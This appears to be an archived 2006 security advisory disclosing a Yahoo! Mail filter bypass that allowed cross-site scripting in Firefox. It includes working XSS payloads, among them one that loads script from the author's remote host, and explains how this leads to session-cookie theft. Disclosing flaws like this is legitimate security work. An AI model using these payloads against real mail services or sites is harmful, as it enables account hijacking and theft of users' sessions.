what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

yahooXSSflaw.txt

yahooXSSflaw.txt
Posted Jul 28, 2006
Authored by Simo64 | Site morx.org

Yahoo! Mail suffers from a cross site scripting flaw.

tags | advisory, xss
SHA-256 | 53aa1dbba6ce325a55d608e20fde59636f71ead1fd1dfcdde26ec3e0a8a77207

yahooXSSflaw.txt

Change Mirror Download
Title: Yahoo! Mail Filter Bypass

Author: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org>
Discovered: january 2006
published: 26 july 2006
MorX Security Research Team
http://www.morx.org
http://www.morx.org/yahoo-firefox-bypass.txt

Service: Webmail

Vendor: Yahoo mail, and possibly others

Vulnerability: Filter bypass / Cross Site Scripting

Severity: Medium/High

Tested to be vulnerable on: FireFox 1.5.0.4

not vulnerable: Microsoft IE 6.0, Opera 8.54

Details:

few months ago i have published a vulnerability affecting Yahoo mail with
MS IE, where yahoo mail filter failed to detect script attributes in
combination with the style attribute as a tag,

the combination code was:
<STYLE onload="alert(document.cookie)"> </STYLE>

few days later yahoo patched the above combination

so now if you try to send your self that code, you will see that yahoo
filters it this way

<style onfiltered="alert(document.cookie)"> </style>

this is not a good way of filtering, since yahoo filtered only the
"onload" attribute

few days later i received some emails asking how a similar
bypass-combination can be executed on other browsers such as firefox since
that one worked only on IE, after making some tests i realised that
firefox will execute any js code proceeded by <style as a tag

example:

<style <script>alert('a')</script>
or
<style <body onload="alert('a')">

note that <style must be left open, if you close it with </style> firefox
wont execute the js code

in fact the first combination will not be filtered by yahoo mail, usualy
yahoo filters <script> and </script> but if proceeded by the <style tag it
wont be filtered at all which will lead to script execution on firefox and
leads to user account compromise

exploit code example

<style <script>alert(document.cookie)</script>

<style <script SRC=http://www.morx.org/xss.js></script>

as you can see here from my yahoo mail message source code, the code is
left unfiltered:


<div id=message>


<!-- type = text -->


<style <script SRC=http://www.morx.org/xss.js></script><BR>


Impact:

an attacker can send the unfiltered code as an html email to a yahoo mail
user with FireFox. Once the victim opens the malicious email the
javascript content will be executed in the the target browser. This will
allow user's session cookie theft, giving the attacker access to the
victim mail box for about 24 hours (until the cookie expires)

Screen captures:

www.morx.org/yahoo-firefox-bypass.jpg

workaround:

Switch to another browser, or disable script execution until a patch is
released

Disclaimer:

this entire document is for eductional, testing and demonstrating purpose
only. Modification use and/or publishing this information is entirely on
your OWN risk. The exploit code is to be used on your OWN email account. I
cannot be held responsible for any of the above. comments or additional
questions feel free to email me at simo_at_morx_org

Login or Register to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    19 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    28 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    19 Files
  • 7
    Jun 7th
    23 Files
  • 8
    Jun 8th
    11 Files
  • 9
    Jun 9th
    10 Files
  • 10
    Jun 10th
    4 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    27 Files
  • 20
    Jun 20th
    65 Files
  • 21
    Jun 21st
    10 Files
  • 22
    Jun 22nd
    8 Files
  • 23
    Jun 23rd
    6 Files
  • 24
    Jun 24th
    6 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close